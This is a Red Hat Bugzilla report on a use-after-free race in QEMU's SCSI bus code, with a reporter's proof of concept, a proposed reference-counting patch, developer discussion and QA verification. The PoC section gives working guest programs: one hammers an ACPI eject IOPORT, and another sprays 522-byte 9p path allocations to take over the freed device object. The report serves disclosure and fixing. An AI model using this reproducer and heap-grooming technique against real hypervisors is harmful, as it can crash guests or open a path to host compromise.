Created attachment 1700266 [details]
Qemu-scsi-use-after-free-reproducer

Wenxiang Qian <leonwxqian> has reported this issue. It is quite similar to BZ#1812399.
-> https://drive.google.com/file/d/1qGptfDhKJNs5OLQ6a2HPuT_-kRuvIBCu/view
-> https://www.nul.pw/usr/uploads/2020/07/3118145955.jpg

Description of problem:

Overview:
=========
The "opaque" object passed to scsi_dma_restart_bh can be used after it has been
freed. The operation qemu_bh_delete(s->bh); dereferences the freed "opaque" (s)
object directly. The freed "s" can be reoccupied by other data, so s->bh can
point to an arbitrary address, which qemu_bh_delete then frees:

void qemu_bh_delete(QEMUBH *bh)
{
    g_free(bh);
}

Root cause of the vulnerability:
================================
1. Whenever a SCSI device is added/plugged into the guest, the callback
   scsi_dma_restart_cb is registered.
2. On a guest run-state change, scsi_dma_restart_cb is called and, if the
   guest is not shutting down, schedules the bottom half scsi_dma_restart_bh
   with opaque=s.
3. The main I/O thread loops in glib_pollfds_poll; when an fd is ready, AIO
   operations run and scsi_dma_restart_bh is called. (The 'USE' part)
4. Meanwhile, an attacker can write to an IOPORT to unplug the device; in
   another thread this triggers acpi_pcihp_eject_slot, then device_unparent,
   which frees the memory belonging to the device. (The 'FREE' part)
5. Steps (3) and (4) race; if (4) runs before (3), there is a use-after-free.

Related code:
*hw/scsi/scsi-bus.c*: scsi_dma_restart_cb, scsi_dma_restart_bh
*hw/acpi/pcihp.c*: acpi_pcihp_eject_slot

Version-Release number of selected component (if applicable):
- Host: Ubuntu 16.04 x86_64
- Guest: Ubuntu 18.04 x86_64
- Qemu: 4.2.0 (I checked the commits between 4.2.0 and 5.0.0 and I believe
  5.0.0 has the same problem)
- libvirt: 6.0.0 with KVM enabled

How reproducible:
- The crash occurs intermittently.

Steps to Reproduce:

Different ways to trigger the use-after-free:
=============================================
a. If the guest system can be suspended (paused), here is a simple way to test:
1. Find the slot number of the disk X to be attached (by finding the next
   available slot number in lspci).
2. Do not attach disk X yet; start a program in the guest that *infinitely*
   writes (2 << slot) to the IOPORT of the bus, trying to release disk X.
3. Pause the guest and attach disk X.
4. Resume the guest. The bh callback and the IOPORT write should now run at
   the same time and, by chance, cause the UAF. If it does not succeed,
   repeat steps 3-4.
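At its core, the bug is a scheduled callback capturing a pointer that another
thread frees before the callback runs. Below is a minimal standalone sketch of
that pattern; the Device type, the thread bodies, and all names are
hypothetical stand-ins for the bottom half and the IOPORT-triggered eject, not
QEMU code:

//uaf_race_sketch.c - minimal stand-in for the scsi_dma_restart_bh race.
//Build: gcc -pthread -fsanitize=address uaf_race_sketch.c -o sketch
#include <pthread.h>
#include <stdlib.h>

typedef struct Device {
    void *bh;                       /* stand-in for s->bh */
} Device;

static Device *dev;                 /* the "plugged" SCSI device */

/* Stand-in for scsi_dma_restart_bh: the deferred callback that was
 * scheduled with opaque = dev.  This is the 'USE' part. */
static void *main_loop_thread(void *arg)
{
    Device *s = dev;                /* opaque captured at schedule time */
    s->bh = NULL;                   /* like qemu_bh_delete(s->bh): UAF if s is freed */
    return NULL;
}

/* Stand-in for the IOPORT-triggered eject path (acpi_pcihp_eject_slot ->
 * device_unparent).  This is the 'FREE' part. */
static void *unplug_thread(void *arg)
{
    free(dev);
    return NULL;
}

int main(void)
{
    dev = calloc(1, sizeof(*dev));  /* device realized, bh already scheduled */

    pthread_t use, fre;
    pthread_create(&use, NULL, main_loop_thread, NULL);
    pthread_create(&fre, NULL, unplug_thread, NULL);  /* races with the bh */
    pthread_join(use, NULL);
    pthread_join(fre, NULL);
    return 0;  /* ASan flags heap-use-after-free when the free wins the race */
}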
PoC:
====
1. Create a disk image and install Ubuntu on it, then update "source file=" in
   d.xml to the path of the disk image. (The disk I used is about 4 GB; if you
   need it, I can try to share it with you via e.g. Google Cloud Storage.)

   <disk type='file' device='disk'>
     <driver name='qemu' type='qcow2'/>
     <source file='/foo/bar.qcow2'/>  <!-- here -->
     <target dev='sda' bus='scsi'/>
     <address type='drive' controller='0' bus='0' target='0' unit='0'/>
   </disk>

2. We use 9p to reoccupy the memory of the freed object, via the strdup
   (malloc) there: create a new directory on the host, such as ~/share, and
   inside it create the folder AAAA..(255 A's)/AAAA..(255 A's)/AAAAAAAAAA
   (10 A's). This gives a 255+1+255+1+10 = 522-byte path, the same size as
   the freed SCSIDevice object (64-bit). Then modify the directory in d.xml
   to point to ~/share:
   -> <qemu:arg value='local,id=share,path=/home/foo/share,security_model=none'/>

3. Create a disk, for example by running `qemu-img create -f qcow2
   ./foo.qcow2 10M` on the host, and update the disk path in disk1.xml to
   ./foo.qcow2.

4. Run `virsh create d.xml`; a guest machine named "testpoc" should be listed
   in libvirt.

5. Connect to testpoc, then write and compile this program in the guest:

   //io2.c:
   #include <sys/io.h>
   #include <stdlib.h>

   int main(void)
   {
       iopl(3);
       while (1) {
           outb(1 << 2, 0xae08);
       }
       return 0;
   }

   Compile with: gcc -O2 ./io2.c -o ./io2

6. Please compile this in the guest too:

   //9pacc.c
   #include <stdio.h>
   #include <stdlib.h>
   #include <string.h>
   #include <unistd.h>
   #include <dirent.h>

   #define FSIZE 0x300

   int main(void)
   {
       char foo[256] = {0};
       char boo[256] = {0};
       char foldername[FSIZE] = {0};
       memset(foo, 0x41, 255);
       memset(boo, 0x42, 255);
       snprintf(foldername, FSIZE, "/home/leonwxqian/share/%s/%s/AAAAAAAAAA",
                foo, boo);
       DIR *dir = 0;
       while (1) {
           dir = opendir(foldername);
           if (dir) {
               closedir(dir);
           }
       }
       return 0;
   }

   Compile with: gcc ./9pacc.c -o ./9pacc

7. Create the folder ~/share in the guest, then (please change this to the
   directory you created in step 2!):
   sudo mount -t 9p -o trans=virtio,version=9p2000.L share /home/leonwxqian/share

8. Start "./9pacc &" in the guest.

9. Start "sudo ./io2" in the guest.

10. Run "poc.sh" on the host machine; if it does not succeed, run poc.sh again.

Actual results:
- Guest VM crashes
- https://www.nul.pw/usr/uploads/2020/07/3118145955.jpg

Expected results:
- Should not crash the guest.

Additional info:
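As background on the 9p heap-grooming step above: the freed SCSIDevice chunk
can be reoccupied by the 522-byte strdup of the 9p path, which is why the
folder-name lengths were matched to the object size. A small standalone sketch
of the idea (allocator-dependent and not guaranteed; not QEMU code):

//heap_reuse_sketch.c - why a 522-byte path can reoccupy the freed device.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
    void *victim = malloc(522);      /* stand-in for the SCSIDevice */
    printf("victim : %p\n", victim);
    free(victim);                    /* the 'FREE' part */

    char path[522];                  /* 521 chars + NUL = 522-byte allocation */
    memset(path, 'A', sizeof(path) - 1);
    path[sizeof(path) - 1] = '\0';
    char *spray = strdup(path);      /* 9p path strdup: same-size malloc */
    printf("spray  : %p\n", spray);  /* with glibc malloc, often the same
                                      * address as victim, since the freed
                                      * chunk is recycled for the request */
    free(spray);
    return 0;
}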
Proposed fix patch from Paolo Bonzini

| I think this is simpler than the issue that Maxim is working on.
| Wenxiang, would this fix your PoC?
|
| diff --git a/hw/scsi/scsi-bus.c b/hw/scsi/scsi-bus.c
| index 1c980cab38..1b0cf91532 100644
| --- a/hw/scsi/scsi-bus.c
| +++ b/hw/scsi/scsi-bus.c
| @@ -137,6 +137,7 @@ static void scsi_dma_restart_bh(void *opaque)
|          scsi_req_unref(req);
|      }
|      aio_context_release(blk_get_aio_context(s->conf.blk));
| +    object_unref(OBJECT(s));
|  }
|
|  void scsi_req_retry(SCSIRequest *req)
| @@ -155,6 +156,8 @@ static void scsi_dma_restart_cb(void *opaque, int running, RunState state)
|      }
|      if (!s->bh) {
|          AioContext *ctx = blk_get_aio_context(s->conf.blk);
| +        /* The reference is dropped in scsi_dma_restart_bh. */
| +        object_ref(OBJECT(s));
|          s->bh = aio_bh_new(ctx, scsi_dma_restart_bh, s);
|          qemu_bh_schedule(s->bh);
|      }
|
| Thanks,
| Paolo
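For context, the patch applies the standard keep-alive pattern: take a
reference on the object when scheduling deferred work that captures it, and
drop the reference when that work has run, so the object cannot be freed
while the bottom half is pending. A generic single-threaded sketch of the
pattern follows; Obj, obj_ref, and obj_unref are hypothetical names, not
QEMU's QOM API (the real fix relies on QOM's thread-safe reference counting):

//refcount_keepalive.c - generic sketch of the fix's keep-alive pattern.
#include <stdio.h>
#include <stdlib.h>

typedef struct Obj { int refcnt; } Obj;

static void obj_ref(Obj *o)   { o->refcnt++; }
static void obj_unref(Obj *o) { if (--o->refcnt == 0) { free(o); printf("freed\n"); } }

/* Deferred work, like scsi_dma_restart_bh: safe to touch 'o' because the
 * reference taken at schedule time pins it until we are done. */
static void bottom_half(void *opaque)
{
    Obj *o = opaque;
    /* ... restart requests, delete the bh ... */
    obj_unref(o);             /* drop the reference taken at schedule time */
}

/* Like scsi_dma_restart_cb: pin the object before handing it to the bh. */
static void schedule_bottom_half(Obj *o)
{
    obj_ref(o);               /* the reference is dropped in bottom_half() */
    bottom_half(o);           /* placeholder for aio_bh_new + qemu_bh_schedule */
}

int main(void)
{
    Obj *o = calloc(1, sizeof(*o));
    obj_ref(o);               /* owner's reference */
    schedule_bottom_half(o);  /* object survives even if the owner unrefs */
    obj_unref(o);             /* owner "unplugs": freed only now */
    return 0;
}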
Hi, could you please describe how the customer can reproduce this issue? For
example, what qemu command line is used to create the VM, and what actions
may hit this issue.
Hello Qing,

(In reply to qing.wang from comment #2)
> Hi, could you please describe how the customer can reproduce this issue?
> For example, what qemu command line is used to create the VM, and what
> actions may hit this issue.

The attachment here contains 3 files - d.xml, disk1.xml and poc.sh.

d.xml has the guest configuration and command line parameters in it. The
guest starts with:

  $ virsh create --console d.xml

We need to edit d.xml and disk1.xml to set the local guest image and qemu
paths as described above.

Hope it helps. Thank you.
I tried to reproduce this with the latest qemu (which contains my and Paolo's
scsi/rcu work), and I haven't been able to hit it yet; however, I do think
that, at least in theory, the race is still there.

For the use-after-free to happen, this sequence of events should still be
possible in theory:

1. A vm-continue event schedules scsi_dma_restart_bh (this has to happen
   before the scsi device is unrealized, because the first thing
   scsi_qdev_unrealize does is remove the VM state change callback which
   schedules scsi_dma_restart_bh).
2. The scsi device is unrealized, dropped off the bus, and scheduled for
   removal by the RCU callback.
3. The rcu thread callback frees the scsi device.
4. For some reason, only now is the bottom half run.

I'll send Paolo's patch upstream to discuss it there.

Best regards,
	Maxim Levitsky
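To make that ordering concrete, here is a small single-threaded sketch of the
four steps, assuming a one-slot stand-in for the bottom-half queue and for the
RCU-deferred free (all names hypothetical; not QEMU or RCU code):

//bh_ordering_sketch.c - the four-step sequence from the comment above.
//Build with -fsanitize=address to see the use-after-free.
#include <stdlib.h>

typedef void (*BhFn)(void *);
static BhFn  pending_fn;               /* one-slot stand-in for the bh queue */
static void *pending_arg;

static void schedule_bh(BhFn f, void *a) { pending_fn = f; pending_arg = a; }

static void dma_restart_bh(void *dev)
{
    *(char *)dev = 0;                  /* touches memory step 3 already freed */
}

int main(void)
{
    void *dev = malloc(64);

    schedule_bh(dma_restart_bh, dev);  /* 1. vm-continue schedules the bh     */
                                       /* 2. unrealize: state-change callback
                                        *    removed, device dropped off bus  */
    free(dev);                         /* 3. rcu callback frees the device    */
    pending_fn(pending_arg);           /* 4. the bh finally runs: UAF         */
    return 0;
}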
Resolved by qemu-kvm upstream commit cfd4e36352d4426221aa94da44a172da1aaa741b.

Setting ITM=13 under the assumption that Maxim will be able to post the
downstream patch soon. We will need a qa_ack+ please, too. Feel free to alter
the ITM I chose to a later value.
Yep.
Test on Red Hat Enterprise Linux release 8.4 Beta (Ootpa)
4.18.0-287.el8.x86_64
qemu-kvm-common-5.2.0-6.module+el8.4.0+9871+53903be9.x86_64

Test steps refer to https://bugzilla.redhat.com/show_bug.cgi?id=1812399#c27

Scenario 1:
1. Boot the vm:
virsh define pc.xml; virsh start pc

2. Hot-plug and unplug a disk repeatedly:
while true; do virsh attach-device pc disk.xml; virsh detach-device pc disk.xml; done

Ran for over 10 hours; no crash found.

Scenario 2:
1. Create the image files:
qemu-img create -f qcow2 /home/kvm_autotest_root/images/stg0.qcow2 1G
...
qemu-img create -f qcow2 /home/kvm_autotest_root/images/stg40.qcow2 1G

2. Boot the vm:
/usr/libexec/qemu-kvm \
-name 'avocado-vt-vm1' \
-sandbox on \
-machine pc \
-device pcie-root-port,id=pcie-root-port-0,multifunction=on,bus=pci.0,addr=0x2,chassis=1 \
-device pcie-pci-bridge,id=pcie-pci-bridge-0,addr=0x0,bus=pcie-root-port-0 \
-nodefaults \
-device VGA,bus=pci.0,addr=0x3 \
-m 2048 \
-smp 12,maxcpus=12,cores=6,threads=1,sockets=2 \
-device pcie-root-port,id=pcie-root-port-1,bus=pci.0,chassis=2 \
-device pcie-root-port,id=pcie-root-port-2,port=0x2,bus=pci.0,chassis=3 \
-device qemu-xhci,id=usb1,bus=pcie-root-port-1,addr=0x0 \
-device usb-tablet,id=usb-tablet1,bus=usb1.0,port=1 \
-object iothread,id=iothread1 \
-device virtio-scsi,id=scsi0 \
-device virtio-scsi,id=scsi1,iothread=iothread1 \
-drive id=drive_image1,if=none,snapshot=off,aio=threads,cache=none,format=qcow2,file=/home/kvm_autotest_root/images/rhel831-64-virtio-scsi.qcow2 \
-device scsi-hd,id=image1,drive=drive_image1,bootindex=0,bus=scsi0.0 \
\
-blockdev node-name=test_disk0,driver=file,filename=/home/kvm_autotest_root/images/stg0.qcow2 \
-device scsi-hd,drive=test_disk0,bus=scsi1.0,bootindex=-1,id=scsi_disk0,channel=0,scsi-id=0,lun=0,share-rw \
-blockdev node-name=test_disk1,driver=file,filename=/home/kvm_autotest_root/images/stg1.qcow2 \
-blockdev node-name=test_disk2,driver=file,filename=/home/kvm_autotest_root/images/stg2.qcow2 \
-blockdev node-name=test_disk3,driver=file,filename=/home/kvm_autotest_root/images/stg3.qcow2 \
-blockdev node-name=test_disk4,driver=file,filename=/home/kvm_autotest_root/images/stg4.qcow2 \
-blockdev node-name=test_disk5,driver=file,filename=/home/kvm_autotest_root/images/stg5.qcow2 \
-blockdev node-name=test_disk6,driver=file,filename=/home/kvm_autotest_root/images/stg6.qcow2 \
-blockdev node-name=test_disk7,driver=file,filename=/home/kvm_autotest_root/images/stg7.qcow2 \
-blockdev node-name=test_disk8,driver=file,filename=/home/kvm_autotest_root/images/stg8.qcow2 \
-blockdev node-name=test_disk9,driver=file,filename=/home/kvm_autotest_root/images/stg9.qcow2 \
-blockdev node-name=test_disk10,driver=file,filename=/home/kvm_autotest_root/images/stg10.qcow2 \
-blockdev node-name=test_disk11,driver=file,filename=/home/kvm_autotest_root/images/stg11.qcow2 \
-blockdev node-name=test_disk12,driver=file,filename=/home/kvm_autotest_root/images/stg12.qcow2 \
-blockdev node-name=test_disk13,driver=file,filename=/home/kvm_autotest_root/images/stg13.qcow2 \
-blockdev node-name=test_disk14,driver=file,filename=/home/kvm_autotest_root/images/stg14.qcow2 \
-blockdev node-name=test_disk15,driver=file,filename=/home/kvm_autotest_root/images/stg15.qcow2 \
-blockdev node-name=test_disk16,driver=file,filename=/home/kvm_autotest_root/images/stg16.qcow2 \
-blockdev node-name=test_disk17,driver=file,filename=/home/kvm_autotest_root/images/stg17.qcow2 \
-blockdev node-name=test_disk18,driver=file,filename=/home/kvm_autotest_root/images/stg18.qcow2 \
-blockdev node-name=test_disk19,driver=file,filename=/home/kvm_autotest_root/images/stg19.qcow2 \
-blockdev node-name=test_disk20,driver=file,filename=/home/kvm_autotest_root/images/stg20.qcow2 \
-blockdev node-name=test_disk21,driver=file,filename=/home/kvm_autotest_root/images/stg21.qcow2 \
-blockdev node-name=test_disk22,driver=file,filename=/home/kvm_autotest_root/images/stg22.qcow2 \
-blockdev node-name=test_disk23,driver=file,filename=/home/kvm_autotest_root/images/stg23.qcow2 \
-blockdev node-name=test_disk24,driver=file,filename=/home/kvm_autotest_root/images/stg24.qcow2 \
-blockdev node-name=test_disk25,driver=file,filename=/home/kvm_autotest_root/images/stg25.qcow2 \
-blockdev node-name=test_disk26,driver=file,filename=/home/kvm_autotest_root/images/stg26.qcow2 \
-blockdev node-name=test_disk27,driver=file,filename=/home/kvm_autotest_root/images/stg27.qcow2 \
-blockdev node-name=test_disk28,driver=file,filename=/home/kvm_autotest_root/images/stg28.qcow2 \
-blockdev node-name=test_disk29,driver=file,filename=/home/kvm_autotest_root/images/stg29.qcow2 \
-blockdev node-name=test_disk30,driver=file,filename=/home/kvm_autotest_root/images/stg30.qcow2 \
-blockdev node-name=test_disk31,driver=file,filename=/home/kvm_autotest_root/images/stg31.qcow2 \
-blockdev node-name=test_disk32,driver=file,filename=/home/kvm_autotest_root/images/stg32.qcow2 \
-blockdev node-name=test_disk33,driver=file,filename=/home/kvm_autotest_root/images/stg33.qcow2 \
-blockdev node-name=test_disk34,driver=file,filename=/home/kvm_autotest_root/images/stg34.qcow2 \
-blockdev node-name=test_disk35,driver=file,filename=/home/kvm_autotest_root/images/stg35.qcow2 \
-blockdev node-name=test_disk36,driver=file,filename=/home/kvm_autotest_root/images/stg36.qcow2 \
-blockdev node-name=test_disk37,driver=file,filename=/home/kvm_autotest_root/images/stg37.qcow2 \
-blockdev node-name=test_disk38,driver=file,filename=/home/kvm_autotest_root/images/stg38.qcow2 \
-blockdev node-name=test_disk39,driver=file,filename=/home/kvm_autotest_root/images/stg39.qcow2 \
-blockdev node-name=test_disk40,driver=file,filename=/home/kvm_autotest_root/images/stg40.qcow2 \
\
-device pcie-root-port,id=pcie-root-port-3,port=0x3,bus=pci.0,chassis=4 \
-device virtio-net-pci,mac=9a:21:f7:4a:1e:bd,id=idRuZxfv,netdev=idOpPVAe,bus=pcie-root-port-3,addr=0x0 \
-netdev tap,id=idOpPVAe,vhost=on \
-rtc base=localtime,clock=host,driftfix=slew \
-boot menu=off,order=cdn,once=c,strict=off \
-enable-kvm \
-vnc :5 \
-rtc base=localtime,clock=host,driftfix=slew \
-boot order=cdn,once=c,menu=off,strict=off \
-enable-kvm \
-device pcie-root-port,id=pcie_extra_root_port_0,bus=pci.0 \
-monitor stdio \
-chardev file,id=qmp_id_qmpmonitor1,path=/var/tmp/monitor-qmpdbg.log,server,nowait \
-mon chardev=qmp_id_qmpmonitor1,mode=control \
-qmp tcp:0:5955,server,nowait \
-chardev file,path=/var/tmp/monitor-serialdbg.log,id=serial_id_serial0 \
-device isa-serial,chardev=serial_id_serial0

3. Log in to the guest and execute sg_luns with multiple instances:

trap 'kill $(jobs -p)' EXIT SIGINT
for i in `seq 0 32` ; do
    while true ; do
        # sg_luns /dev/sdb > /dev/null 2>&1
        sg_luns /dev/sdb
    done &
done
echo "wait"
wait

4. Hot-plug and unplug multiple disks repeatedly, every 3 seconds:

NUM_LUNS=40

add_devices()
{
    exec 3<>/dev/tcp/localhost/5955
    echo "$@"
    echo -e "{'execute':'qmp_capabilities'}" >&3
    read response <&3
    echo $response
    for i in $(seq 1 $NUM_LUNS) ; do
        cmd="{'execute':'device_add', 'arguments': {'driver':'scsi-hd','drive':'test_disk$i','id':'scsi_disk$i','bus':'scsi1.0','lun':$i}}"
        echo "$cmd"
        echo -e "$cmd" >&3
        read response <&3
        echo "$response"
    done
}

remove_devices()
{
    exec 3<>/dev/tcp/localhost/5955
    echo "$@"
    echo -e "{'execute':'qmp_capabilities'}" >&3
    read response <&3
    echo $response
    for i in $(seq 1 $NUM_LUNS) ; do
        cmd="{'execute':'device_del', 'arguments': {'id':'scsi_disk$i'}}"
        echo "$cmd"
        echo -e "$cmd" >&3
        read response <&3
        echo "$response"
    done
}

while true ; do
    echo "adding devices"
    add_devices
    sleep 3
    echo "removing devices"
    remove_devices
    sleep 3
done

Ran for over 10 hours; no crash found.
Since the problem described in this bug report should be resolved in a recent advisory, it has been closed with a resolution of ERRATA. For information on the advisory (virt:av bug fix and enhancement update), and where to find the updated files, follow the link below. If the solution does not work for you, open a new bug report. https://access.redhat.com/errata/RHBA-2021:2098